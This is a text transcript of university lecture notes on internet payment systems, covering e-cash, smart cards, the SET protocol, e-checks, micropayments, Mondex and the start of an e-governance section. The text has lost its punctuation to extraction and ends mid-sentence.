web technology and commerce unit 4
DESCRIPTION
Web technology and commerce unit 4 by arun pratap singhTRANSCRIPT
UNIT IV
PREPARED BY ARUN PRATAP SINGH
WEB TECHNOLOGY AND COMMERCE (MCSE 201)
PREPARED BY ARUN PRATAP SINGH 1
1
INTERNET PAYMENT SYSTEM
Internet payment systems refer to the various methods by which individuals and companies doing
business online collect money from their customers in exchange for the goods and services they
provide A number of different forms of payment exist for online purchases and more are being
developed all the time After all it is in the best interest of both consumers and merchants to make
electronic commerce as safe and easy as possible The low cost of entry has attracted hundreds
of companies large and small to the level playing field of cyberspace Paul J Dowling Jr noted
in his book Web Advertising and Marketing On the Internet a small one-man operation can look
as good or better than a large multinational corporation But whether its an individual working
out of a virtual office or a CEO sitting in an expensive downtown office building theyre going
online for one purposemdashto sell And theyre leaving no stone unturned in their efforts to make it
safe and easy for their customers to buy
Customers who physically visit retail establishments can choose among a variety of payment
methods including cash checks credit cards and debit cards Customers who shop on the
Internet are beginning to expect online merchants to offer the same variety and convenience in
payment terms Credit cards remain the most common form of payment for online purchases
although the options have expanded to include digital cash smart cards electronic checks and
other technologies In addition some customers continue to make online purchases using
traditional payment methods such as placing orders by telephone or fax or sending a check
via snail mail Dowling recommends that companies conducting sales online make as many
payment methods available as possible and advertise their acceptance of those methods on their
Web sites He claims that small businesses can add value to their product or service offerings by
making payment easy comfortable and secure for their customers Getting paid on the Web
ultimately testifies to your marketing plans effectiveness Dowling wrote And when everything
goes as it should customers will place the order
Perhaps the biggest issue affecting online payment systemsmdashfrom both the sellers and the
buyers perspectivesmdashis maintaining the security of financial information sent over the Internet A
survey conducted by Visa showed that 91 percent of consumers were concerned about privacy
and security on the Internet Another study conducted by the Boston Consulting Group and
quoted in Computerworld indicated that 28 percent of consumers online purchase efforts failedmdash
meaning that they intended to buy online but did not complete the transaction Concerns about
security and the perception that online credit card transactions are extremely unsafe seem to be
among the biggest issues keeping many retailers and consumers from closing sales
electronically Lorna Pappas wrote in Chain Store Age Executive
Internet payment system is also known as Electronic Payment system
What Electronic Payment system is
Electronic Payment is a financial exchange that takes place online between buyers and sellers
The content of this exchange is usually some form of digital financial instrument (such as
encrypted credit card numbers electronic cheques or digital cash) that is backed by a bank or an
intermediary or by a legal tender
Electronic payment system is a system which helps the customer or user to make online payment
for their shopping
UNIT IV
PREPARED BY ARUN PRATAP SINGH 2
2
Requirements For E-payments
The various factors that have lead the financial institutions to make use of electronic payments
are
1 Decreasing technology cost The technology used in the networks is decreasing day by
day
2 Reduced operational and processing costDue to reduced technology cost the processing
cost of various commerce activities becomes very less A very simple reason to prove this
is the fact that in electronic transactions we save both paper and time
3 Increasing online commerce
Some Examples Of EPS-
Online Reservation
Online Bill Payment
Online Order Placing (Nirulas)
Online Ticket Booking ( Movie)
Major Internet Payment Methods
Secure Electronics Transaction (SET) Protocol for implementing credit card payment
An Electronic Check system for supporting check payment
An Electronic funds transfer and Electronic Cash system for emulating physical cash
payment
Other methods
bull Micropayment methods and Smart card methods
Two Storage Methods
On-line
Individual does not have possession personally of electronic cash
Trusted third party eg online bank holds customersrsquo cash accounts
Off-line
Customer holds cash on smart card or software wallet
Fraud and double spending require tamper-proof encryption
PREPARED BY ARUN PRATAP SINGH 3
3
E-Cash
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
PREPARED BY ARUN PRATAP SINGH 4
4
E-Wallet
The E-wallet is another payment scheme that operates like a carrier of e-cash and other
information
The aim is to give shoppers a single simple and secure way of carrying currency
electronically
Trust is the basis of the e-wallet as a form of electronic payment
Procedure for using an e-wallet
1 Decide on an online site where you would like to shop
2 Download a wallet from the merchantrsquos website
3 Fill out personal information such as your credit card number name address and phone
number and where merchandise should be shipped
4 When you are ready to buy click on the wallet button the buying process is fully
executed
PREPARED BY ARUN PRATAP SINGH 5
5
Smart Cards
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
Smart card Processing
PREPARED BY ARUN PRATAP SINGH 6
6
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Credit cards
It is a Plastic Card having a Magnetic Number and code on it
It has Some fixed amount to spend
Customer has to repay the spend amount after sometime
PREPARED BY ARUN PRATAP SINGH 7
7
Processing a Credit cards payment ndash
Risk in using Credit cards -
Operational Risk
Credit Risk
Legal Risk
Secure Electronic Transaction (SET) Protocol
Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM
GTE SAIC and others
Designed to provide security for card payments as they travel on the Internet
Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers
and merchants in addition to providing secure transmission
SET specification
Uses public key cryptography and digital certificates for validating both
consumers and merchants
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
